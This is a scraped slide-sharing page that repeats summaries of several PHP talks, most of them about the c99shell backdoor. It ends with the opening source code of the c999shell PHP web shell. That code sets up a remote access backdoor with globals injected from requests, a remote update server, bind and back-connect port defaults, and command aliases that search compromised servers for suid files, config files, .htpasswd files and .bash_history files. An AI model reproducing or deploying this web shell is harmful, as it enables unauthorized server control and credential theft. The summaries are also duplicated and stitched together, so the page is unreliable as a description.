This document contains PHP code for a backdoor shell. It defines configuration variables like login credentials, directories, command aliases, and other settings. It also handles authentication, sets up sessions and cookies, and has code to update the backdoor. The goal is to provide a remote access shell that can execute commands, browse files, and perform other operations on the compromised server.
This document contains PHP code for a backdoor shell. It defines various configuration settings like directories, login credentials, command aliases, and other functionality. The code authenticates the user, handles requests, and provides a basic interface for accessing the system.
This document contains the configuration and settings for a PHP web shell. It defines variables for authentication, file types, commands, colors, and other options. It also contains code to check the request, merge parameters, and start the shell session.
This document contains the configuration and code for a PHP web shell. It sets various configuration options like the shell version, directories, file types, commands, and colors. It also checks for authentication if a login is set, sets PHP settings, merges request variables, and includes code to bypass safe mode restrictions. The code is for a backdoored web shell that provides access to the server's file system and allows execution of commands.
This document contains the configuration and initialization code for a PHP web shell called c99shell. It sets variables for login credentials, directories, file types, aliases and other settings. It also includes code to handle cookies and sessions for the shell interface.
This document contains the configuration and settings for a PHP shell script called c99shell. It defines variables for authentication, directories, file types, commands, colors and other options. It checks the client's IP and host name against allowed patterns. If authentication is enabled, it will check the login and password. The script merges request parameters to global variables for use throughout.
This document contains information about c99shell.php, a PHP-based file manager tool intended for hacking. It lists features like managing local and remote files/folders, an advanced SQL manager, executing shell commands and PHP code, and self-removal. The document provides configuration options, registered file types, command aliases, and notes on expected future changes.
Teaching Your Machine To Find FraudstersIan Barber
The slides from my talk at PHP Tek 11.
When dealing with money online, fraud is an ongoing problem for both
consumers and sellers. Researchers have been developing statistical
and machine learning techniques to detect shady sellers on auction
sites, spot fraudulent payments on e-commerce systems and catch click
fraud on adverts. While there is no silver bullet, you will learn to
flag suspicious activity and help protect your site from scammers
using PHP and a little help from some other technologies.
Debugging: Rules And Tools - PHPTek 11 VersionIan Barber
The document provides rules and tools for debugging. It discusses understanding the system, making failures reproducible, quitting thinking and closely observing behaviors, dividing problems into smaller pieces, changing one thing at a time, and maintaining an audit trail of changes. Tools mentioned include Xdebug, Selenium, PHPUnit, strace, and source control systems. Logging, instrumentation, and testing techniques are also covered.
This document contains PHP code for a backdoor shell. It defines various configuration settings like directories, login credentials, command aliases, and other functionality. The code authenticates the user, handles requests, and provides a basic interface for accessing the system.
This document contains the configuration and settings for a PHP web shell. It defines variables for authentication, file types, commands, colors, and other options. It also contains code to check the request, merge parameters, and start the shell session.
This document contains the configuration and code for a PHP web shell. It sets various configuration options like the shell version, directories, file types, commands, and colors. It also checks for authentication if a login is set, sets PHP settings, merges request variables, and includes code to bypass safe mode restrictions. The code is for a backdoored web shell that provides access to the server's file system and allows execution of commands.
This document contains the configuration and initialization code for a PHP web shell called c99shell. It sets variables for login credentials, directories, file types, aliases and other settings. It also includes code to handle cookies and sessions for the shell interface.
This document contains the configuration and settings for a PHP shell script called c99shell. It defines variables for authentication, directories, file types, commands, colors and other options. It checks the client's IP and host name against allowed patterns. If authentication is enabled, it will check the login and password. The script merges request parameters to global variables for use throughout.
This document contains information about c99shell.php, a PHP-based file manager tool intended for hacking. It lists features like managing local and remote files/folders, an advanced SQL manager, executing shell commands and PHP code, and self-removal. The document provides configuration options, registered file types, command aliases, and notes on expected future changes.
Teaching Your Machine To Find FraudstersIan Barber
The slides from my talk at PHP Tek 11.
When dealing with money online, fraud is an ongoing problem for both
consumers and sellers. Researchers have been developing statistical
and machine learning techniques to detect shady sellers on auction
sites, spot fraudulent payments on e-commerce systems and catch click
fraud on adverts. While there is no silver bullet, you will learn to
flag suspicious activity and help protect your site from scammers
using PHP and a little help from some other technologies.
Debugging: Rules And Tools - PHPTek 11 VersionIan Barber
The document provides rules and tools for debugging. It discusses understanding the system, making failures reproducible, quitting thinking and closely observing behaviors, dividing problems into smaller pieces, changing one thing at a time, and maintaining an audit trail of changes. Tools mentioned include Xdebug, Selenium, PHPUnit, strace, and source control systems. Logging, instrumentation, and testing techniques are also covered.
This document provides an overview of 0MQ and examples of how to use it with PHP. It introduces 0MQ patterns like request/response, pub/sub, queue, and pipeline. Code snippets in PHP demonstrate implementing these patterns using 0MQ sockets. Additional resources for learning more about 0MQ and using it with PHP are provided at the end.
This document provides an overview of the Drush command line tool for Drupal, including the most commonly used Drush commands, installation instructions for Windows and Unix-like systems, configuration of aliases for sites, code and database synchronization, and development features like Drush make. It also demonstrates how to extend Drush by creating custom commands.
Using Mikko Koppanen's PHP ZMQ extension we will look at how you can easily distribute work to background processes, provide flexible service brokering for your next service oriented architecture, and manage caches efficiently and easily with just PHP and the ZeroMQ libraries. Whether the problem is asynchronous communication, message distribution, process management or just about anything, ZeroMQ can help you build an architecture that is more resilient, more scalable and more flexible, without introducing unnecessary overhead or requiring a heavyweight queue manager node.
The Browser Environment - A Systems Programmer's Perspective [sinatra edition]Eleanor McHugh
The document discusses using Sinatra and Ruby to build web applications that utilize asynchronous JavaScript and XMLHttpRequest (AJAX) techniques. It demonstrates how to make HTTP requests to a Sinatra backend from JavaScript using XMLHttpRequest, Fetch API promises, and DOM manipulation. Various timing functions like setInterval and setTimeout are also explored. The document contains sample code for building a basic Sinatra API and incrementally enhancing the frontend JavaScript code to retrieve and display responses asynchronously.
Designing Opeation Oriented Web Applications / YAPC::Asia Tokyo 2011Masahiro Nagano
The document describes using Log::Minimal to log messages with timestamps, severity levels, and stack traces. Log::Minimal provides functions like debugf(), infof(), warnf() that log messages, and configuration options like AUTODUMP and PRINT to customize the output format. It can be used to log messages from multi-threaded or distributed applications.
Conférence données à l'Open World Forum, 05 octobre 2013.
Comment créer une base de données noSQL par paires clés-valeurs en moins d'une heure, en se basant sur le bibliothèques Nanomsg et LightningDB.
Conheça um pouco mais sobre Perl 6, uma linguagem de programação moderna, poderosa e robusta que permitirá que você escreva código de forma ágil e eficiente.
This document provides an overview of 0MQ (also known as ZeroMQ), a messaging library that enables various messaging patterns like request/reply, publish/subscribe, and queueing. It includes code examples in multiple languages like Erlang, Python, and PHP demonstrating how to implement common 0MQ patterns. Links are also provided for additional 0MQ resources.
PHP 7.1 contains new exciting features and improvements that can facilitate the life of many PHP developers. During the talk I will show some of these new features like nullable types, catching of multiple exceptions, the curl HTTP/2 server push support, void return types, Class constant visibility, authenticated encryption in OpenSSL with GCM and CCM modes, and more.
As presented at Confoo 2013.
More than some arcane NoSQL tool, Redis is a simple but powerful swiss army knife you can begin using today.
This talk introduces the audience to Redis and focuses on using it to cleanly solve common problems. Along the way, we'll see how Redis can be used as an alternative to several common PHP tools.
This document describes MyShell, an interactive PHP script that allows execution of commands on a server. It includes configuration options like authentication, allowed directories, error handling and output formatting. The script generates an HTML interface with a text area to view command output. Users can navigate directories, enter commands and view results within permissions set by the administrator.
From mysql to MongoDB(MongoDB2011北京交流会)Night Sailer
The document summarizes differences between MySQL and MongoDB data types and operations. MongoDB uses BSON for data types rather than separate numeric, text and blob types. It supports embedded documents and arrays. Unlike MySQL, MongoDB does not have tables or rows, but collections and documents. Operations like insert, update, find, sort and index are discussed as alternatives to SQL equivalents.
The Browser Environment - A Systems Programmer's PerspectiveEleanor McHugh
The document discusses asynchronous JavaScript and XML (AJAX) techniques for making asynchronous HTTP requests from the browser. It provides code examples using XMLHttpRequest and the newer Fetch API to make requests to server-side handlers written in Go. The code sets up a simple page that displays buttons for different asynchronous actions, and uses JavaScript functions to make requests on button click, printing the responses to a log on the page. This demonstrates asynchronous interactivity between the browser and server.
This document contains PHP code for a web shell that provides a backdoor access to a compromised server. It defines variables for authentication, colors, and default actions. It also contains functions for handling authentication, printing headers/footers, and executing commands via the aliases array. The aliases array defines commands to run on both Windows and Linux servers, including commands to find/locate files and directories.
ZeroMQ Is The Answer: PHP Tek 11 VersionIan Barber
This document provides an overview of ZeroMQ (0MQ), an asynchronous messaging library. It discusses 0MQ concepts like request/response, publish/subscribe, and pipelines. It includes code examples in PHP and Python demonstrating how to implement these patterns using 0MQ sockets and messaging. Additional sections cover 0MQ transport types, installation, and integrating 0MQ with other systems like Mongrel2.
This document contains the configuration and code for a PHP backdoor shell. It sets various options like the shell version, directories, enabled functions, command aliases, and more. The code also checks for updates, handles file operations and sessions, and has logic to restrict access by IP, authentication, or other means.
This document contains the configuration and settings for a PHP shell script called c99shell. It defines variables for authentication, allowed hosts, directories, file types, commands, colors and other options. It appears to be code for a backdoor shell that provides access to the system it is running on.
Can't Miss Features of PHP 5.3 and 5.4Jeff Carouth
If you're like me you remember the days of PHP3 and PHP4; you remember when PHP5 was released, and how it was touted to change to your life. It's still changing and there are some features of PHP 5.3 and new ones coming with PHP 5.4 that will improve your code readability and reusability. Let's look at some touted features such as closures, namespaces, and traits, as well as some features being discussed for future releases.
A lot of people using PHPunit for testing their source code. While I was observing my team
I recognized most of them are only using the standard ssertions like 'assertEquals()' or
'assertTrue()' and are complaining about how hard it is to test the code even when the tests are written first. This talk is about all the stuff not used on a daily basis. It shows you some nice features of PHPUnit and how to use them for your benefit.
Go beyond the documentation and explore some of what's possible if you stretch symfony to its limits. We will look at a number of aspects of symfony 1.4 and Doctrine 1.2 and tease out some powerful functionality you may not have expected to find, but will doubtless be able to use. Topics covered will include routing, forms, the config cache and record listeners. If you're comfortable in symfony and wondering what's next, this session is for you.
This document provides an overview of 0MQ and examples of how to use it with PHP. It introduces 0MQ patterns like request/response, pub/sub, queue, and pipeline. Code snippets in PHP demonstrate implementing these patterns using 0MQ sockets. Additional resources for learning more about 0MQ and using it with PHP are provided at the end.
This document provides an overview of the Drush command line tool for Drupal, including the most commonly used Drush commands, installation instructions for Windows and Unix-like systems, configuration of aliases for sites, code and database synchronization, and development features like Drush make. It also demonstrates how to extend Drush by creating custom commands.
Using Mikko Koppanen's PHP ZMQ extension we will look at how you can easily distribute work to background processes, provide flexible service brokering for your next service oriented architecture, and manage caches efficiently and easily with just PHP and the ZeroMQ libraries. Whether the problem is asynchronous communication, message distribution, process management or just about anything, ZeroMQ can help you build an architecture that is more resilient, more scalable and more flexible, without introducing unnecessary overhead or requiring a heavyweight queue manager node.
The Browser Environment - A Systems Programmer's Perspective [sinatra edition]Eleanor McHugh
The document discusses using Sinatra and Ruby to build web applications that utilize asynchronous JavaScript and XMLHttpRequest (AJAX) techniques. It demonstrates how to make HTTP requests to a Sinatra backend from JavaScript using XMLHttpRequest, Fetch API promises, and DOM manipulation. Various timing functions like setInterval and setTimeout are also explored. The document contains sample code for building a basic Sinatra API and incrementally enhancing the frontend JavaScript code to retrieve and display responses asynchronously.
Designing Opeation Oriented Web Applications / YAPC::Asia Tokyo 2011Masahiro Nagano
The document describes using Log::Minimal to log messages with timestamps, severity levels, and stack traces. Log::Minimal provides functions like debugf(), infof(), warnf() that log messages, and configuration options like AUTODUMP and PRINT to customize the output format. It can be used to log messages from multi-threaded or distributed applications.
Conférence données à l'Open World Forum, 05 octobre 2013.
Comment créer une base de données noSQL par paires clés-valeurs en moins d'une heure, en se basant sur le bibliothèques Nanomsg et LightningDB.
Conheça um pouco mais sobre Perl 6, uma linguagem de programação moderna, poderosa e robusta que permitirá que você escreva código de forma ágil e eficiente.
This document provides an overview of 0MQ (also known as ZeroMQ), a messaging library that enables various messaging patterns like request/reply, publish/subscribe, and queueing. It includes code examples in multiple languages like Erlang, Python, and PHP demonstrating how to implement common 0MQ patterns. Links are also provided for additional 0MQ resources.
PHP 7.1 contains new exciting features and improvements that can facilitate the life of many PHP developers. During the talk I will show some of these new features like nullable types, catching of multiple exceptions, the curl HTTP/2 server push support, void return types, Class constant visibility, authenticated encryption in OpenSSL with GCM and CCM modes, and more.
As presented at Confoo 2013.
More than some arcane NoSQL tool, Redis is a simple but powerful swiss army knife you can begin using today.
This talk introduces the audience to Redis and focuses on using it to cleanly solve common problems. Along the way, we'll see how Redis can be used as an alternative to several common PHP tools.
This document describes MyShell, an interactive PHP script that allows execution of commands on a server. It includes configuration options like authentication, allowed directories, error handling and output formatting. The script generates an HTML interface with a text area to view command output. Users can navigate directories, enter commands and view results within permissions set by the administrator.
From mysql to MongoDB(MongoDB2011北京交流会)Night Sailer
The document summarizes differences between MySQL and MongoDB data types and operations. MongoDB uses BSON for data types rather than separate numeric, text and blob types. It supports embedded documents and arrays. Unlike MySQL, MongoDB does not have tables or rows, but collections and documents. Operations like insert, update, find, sort and index are discussed as alternatives to SQL equivalents.
The Browser Environment - A Systems Programmer's PerspectiveEleanor McHugh
The document discusses asynchronous JavaScript and XML (AJAX) techniques for making asynchronous HTTP requests from the browser. It provides code examples using XMLHttpRequest and the newer Fetch API to make requests to server-side handlers written in Go. The code sets up a simple page that displays buttons for different asynchronous actions, and uses JavaScript functions to make requests on button click, printing the responses to a log on the page. This demonstrates asynchronous interactivity between the browser and server.
This document contains PHP code for a web shell that provides a backdoor access to a compromised server. It defines variables for authentication, colors, and default actions. It also contains functions for handling authentication, printing headers/footers, and executing commands via the aliases array. The aliases array defines commands to run on both Windows and Linux servers, including commands to find/locate files and directories.
ZeroMQ Is The Answer: PHP Tek 11 VersionIan Barber
This document provides an overview of ZeroMQ (0MQ), an asynchronous messaging library. It discusses 0MQ concepts like request/response, publish/subscribe, and pipelines. It includes code examples in PHP and Python demonstrating how to implement these patterns using 0MQ sockets and messaging. Additional sections cover 0MQ transport types, installation, and integrating 0MQ with other systems like Mongrel2.
This document contains the configuration and code for a PHP backdoor shell. It sets various options like the shell version, directories, enabled functions, command aliases, and more. The code also checks for updates, handles file operations and sessions, and has logic to restrict access by IP, authentication, or other means.
This document contains the configuration and settings for a PHP shell script called c99shell. It defines variables for authentication, allowed hosts, directories, file types, commands, colors and other options. It appears to be code for a backdoor shell that provides access to the system it is running on.
Can't Miss Features of PHP 5.3 and 5.4Jeff Carouth
If you're like me you remember the days of PHP3 and PHP4; you remember when PHP5 was released, and how it was touted to change to your life. It's still changing and there are some features of PHP 5.3 and new ones coming with PHP 5.4 that will improve your code readability and reusability. Let's look at some touted features such as closures, namespaces, and traits, as well as some features being discussed for future releases.
A lot of people using PHPunit for testing their source code. While I was observing my team
I recognized most of them are only using the standard ssertions like 'assertEquals()' or
'assertTrue()' and are complaining about how hard it is to test the code even when the tests are written first. This talk is about all the stuff not used on a daily basis. It shows you some nice features of PHPUnit and how to use them for your benefit.
Go beyond the documentation and explore some of what's possible if you stretch symfony to its limits. We will look at a number of aspects of symfony 1.4 and Doctrine 1.2 and tease out some powerful functionality you may not have expected to find, but will doubtless be able to use. Topics covered will include routing, forms, the config cache and record listeners. If you're comfortable in symfony and wondering what's next, this session is for you.
This document contains code snippets for connecting to and extracting information from various data sources and applications using PHP, including:
1. Connecting to Microsoft Word and extracting the subject text from a document.
2. Retrieving thumbnail images from Adobe Lightroom files.
3. Accessing elevation data from SRTM files by calculating file offsets.
4. Sending SNMP traps containing error information from a RADIUS monitoring script.
5. Connecting to an Avaya OSSIS system using telnet and extracting field data.
This document summarizes the history of PHP persistence from 1995 to present day. It begins with early file handling in PHP/FI in 1995 and the introduction of database support. It then discusses the evolution of code reusability through functions and classes. Professional abstraction layers like PEAR and later ORM frameworks provided more robust and standardized APIs. NoSQL databases and drivers were later incorporated, moving beyond relational databases. Current frameworks provide object document mapping for non-SQL databases like MongoDB.
This PHP script is a web shell that allows remote command execution on the server. It sets various PHP configuration options to disable security restrictions. It also checks for an authentication password and sets a cookie upon valid login. The main body defines functions for outputting headers, menus and executing commands via the shell.
The document discusses Augeas, an open source configuration editing tool that parses configuration files into a tree structure and allows editing them using a standardized API, lenses provide parsers for common configuration files and it can be used from configuration management tools like Puppet to securely edit files. Native providers can also be written for Augeas to manage complex configuration files like sshd_config that use grouping.
Raphaël Pinson's talk on "Configuration surgery with Augeas" at PuppetCamp Geneva '12. Video at http://youtu.be/H0MJaIv4bgk
Learn more: www.puppetlabs.com
The document discusses using vfsStream to mock the filesystem in unit tests. vfsStream provides a virtual filesystem that uses PHP streams, allowing tests to manipulate files and directories without interacting with the real filesystem. It describes how to set up vfsStream, create and interact with virtual files and directories, and a vfsStream PHPUnit helper that simplifies its integration with PHPUnit tests.
The document provides tips and tricks for PHP development. It begins with an introduction and contact information for the author. It then lists and describes several tips, including using the ternary operator for short conditional statements, different methods for listing directories, extracting parts of a filepath, checking for non-empty variables, and parsing URL parameters using parse_url and parse_str functions. The document encourages readers to share better solutions and includes additional resources on the PHP manual.
The document summarizes the state of the Lithium framework. It discusses project and community stats including contributors and issues closed. It outlines progress on the roadmap including new features like encrypting and signing cookies, nesting routes, and error handling. Upcoming features mentioned are HTTP service classes, filtering and sorting collections, and schema and multibyte classes. Community plugins are highlighted and tips and tricks are provided before opening for Q&A.
This document summarizes Brian D Foy's presentation on "My Perl Bag of Tricks" given at YAPC::Brasil 2011. Some of the tricks discussed include eliminating special cases, using Perl to do more of the work, scaling code gracefully, parsing XML data efficiently, testing code with sample inputs/outputs, and handling errors gracefully. The presentation aims to show Perl techniques for writing cleaner, more robust code.
international PHP2011_Bastian Feder_The most unknown Parts of PHPUnitsmueller_sandsmedia
PHPUnit provides many features beyond just testing code including:
- Command line options like --testdox to generate styled reports and --filter to select specific tests.
- Annotations like @covers and @group to document and organize tests.
- Various assertion methods like assertContains(), assertType(), and assertSelectRegExp() to validate test conditions.
- Test listeners that get called at different test execution stages to add functionality.
- Ways to test exceptions like @expectedException and try/catch blocks.
- Mocking features to isolate tests from external dependencies using callbacks and return values.
A lot of people using PHPunit for testing their source code. While I was observing my team I recognized most of them are only using the standard assertions like 'assertEquals()' and are complaining about how hard it is to test the code even when the tests are written first. This talk is about all the stuff not used on a daily basis and it digs deep into uncommon features of PHPUnit.
Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Алексей Секрето...Mail.ru Group
This document discusses exploiting PHP unserialization vulnerabilities. It begins by introducing the presenter and explaining what unserialization is and how it can be insecure if magic methods like __wakeup or __destruct are executed after unserialization. Potential vulnerabilities are demonstrated through examples. The document then discusses more complex chains that can be used to exploit unserialization, including examples from real-world projects like Kohana and exploiting serialized data stored in databases. It describes building a tool to automatically find chains in PHP code that could be exploited via unserialization and demonstrates its use on sample code. The document concludes by noting the challenges of automatically generating exploits due to the lack of static analysis in the tool.
Security Meetup 22 октября. «PHP Unserialize Exploiting». Павел Топорков. Лаб...Mail.ru Group
This document discusses exploiting PHP unserialization vulnerabilities. It begins by introducing the presenter and explaining why unserialization is insecure, as magic methods like __destruct can be executed after unserialization. Potential exploits are demonstrated through examples, including using unserialization to execute system commands and perform SSRF attacks. The document also notes that many PHP frameworks and libraries contain classes that could enable chaining multiple exploits through unserialization. It then describes the presenter's tool for analyzing PHP code to find possible exploit chains for unserialization vulnerabilities.
This script is used to start and stop the Apache Tomcat application server. It checks environment variables and Java installation locations. It then executes the specified command, such as "start", "stop", "debug" passing in JVM options and system properties. The script handles tasks like setting up the classpath, checking for required files, and running Java in the background for startup.
1. <?php
//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec,
$sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS,0,3)) == "win";
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function
strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if
(strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr =
stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
$shver = "1.0 pre-release build #16"; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie("c999sh_surl"); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c999sh_surl",$surl);}
else {$surl = $_REQUEST["c999sh_surl"]; //Set this cookie for manual SURL
}
$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors
(URLs) and save it in SURL.
if ($surl_autofill_include and !$_REQUEST["c999sh_surl"]) {$include = "&";
foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name
= urldecode($v[0]); $value = urldecode($v[1]); foreach
(array("http://","https://","ssl://","ftp://","") as $needle) {if
(strpos($value,$needle) === 0) {$includestr .=
urlencode($name)."=".urlencode($value)."&";}}} if
($_REQUEST["surl_autofill_include"]) {$includestr .=
"surl_autofill_include=1&";}}
if (empty($surl))
{
$surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);
$timelimit = 0; //time limit of execution this script over server quote
(seconds), 0 = unlimited.
//Authentication
$login = ""; //login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass = ""; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST
e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "<a href="http://ccteam.ru/releases/c999shell">c999shell
v.".$shver."</a>: access denied";
$gzipencode = TRUE; //Encode with gzip?
$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
$c999sh_updateurl = "http://ccteam.ru/update/c999shell/"; //Update server
$c999sh_sourcesurl = "http://ccteam.ru/files/c999sh_sources/"; //Sources-server
$filestealth = TRUE; //if TRUE, don't change modify- and access-time
2. $donated_html = "<center><b>Owned by hacker</b></center>";
/* If you publish free shell and you wish
add link to your site or any other information,
put here your html. */
$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array,
display $donated_html.
$curdir = "./"; //start folder
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or
%WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
$log_email = "user@host.tld"; //Default e-mail for sending logs
$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or
"d"escending
$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
// Registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3",...),
// "{action2}"=>array("ext4","ext5","ext6",...),
// ...
// )
$ftypes = array(
"html"=>array("html","htm","shtml"),
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htacces
s"),
"exe"=>array("sh","install","bat","cmd"),
"ini"=>array("ini","inf"),
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","
pl"),
"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi
","mpg","mpeg"),
"sdb"=>array("sdb"),
"phpsess"=>array("sess"),
"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
// Registered executable file-types.
// array(
// string "command{i}"=>array("ext1","ext2","ext3",...),
// ...
// )
// {command}: %f% = filename
$exeftypes = array(
getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
"perl %f%" => array("pl","cgi")
);
/* Highlighted files.
array(
i=>array({regexp},{type},{opentag},{closetag},{break})
...
)
string {regexp} - regular exp.
int {type}:
0 - files and folders (as default),
1 - files only, 2 - folders only
string {opentag} - open html-tag, e.g. "<b>" (default)
3. string {closetag} - close html-tag, e.g. "</b>" (default)
bool {break} - if TRUE and found match then break
*/
$regxp_highlight = array(
array(basename($_SERVER["PHP_SELF"]),1,"<font
color="yellow">","</font>"), // example
array("config.php",1) // example
);
$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
// array (i=>{letter} ...); string {letter} - letter of a drive
//$safemode_diskettes = range("a","z");
$hexdump_lines = 8;// lines in hex preview file
$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
$nixpwdperpage = 100; // Get first N lines from /etc/passwd
$bindport_pass = "c999"; // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe
// Command-aliases
if (!$win)
{
$cmdaliases = array(
array("-----------------------------------------------------------", "ls
-la"),
array("find all suid files", "find / -type f -perm -04000 -ls"),
array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("find all sgid files", "find / -type f -perm -02000 -ls"),
array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("find config.inc.php files", "find / -type f -name config.inc.php"),
array("find config* files", "find / -type f -name "config*""),
array("find config* files in current dir", "find . -type f
-name "config*""),
array("find all writable folders and files", "find / -perm -2 -ls"),
array("find all writable folders and files in current dir", "find . -perm -2
-ls"),
array("find all service.pwd files", "find / -type f -name service.pwd"),
array("find service.pwd files in current dir", "find . -type f -name
service.pwd"),
array("find all .htpasswd files", "find / -type f -name .htpasswd"),
array("find .htpasswd files in current dir", "find . -type f -name
.htpasswd"),
array("find all .bash_history files", "find / -type f -name .bash_history"),
array("find .bash_history files in current dir", "find . -type f -name
.bash_history"),
array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("find .fetchmailrc files in current dir", "find . -type f -name
.fetchmailrc"),
array("list file attributes on a Linux second extended file system", "lsattr
-va"),
array("show opened ports", "netstat -an | grep -i listen")
);
}
else
{
$cmdaliases = array(
array("-----------------------------------------------------------", "dir"),
array("show opened ports", "netstat -an")
);
}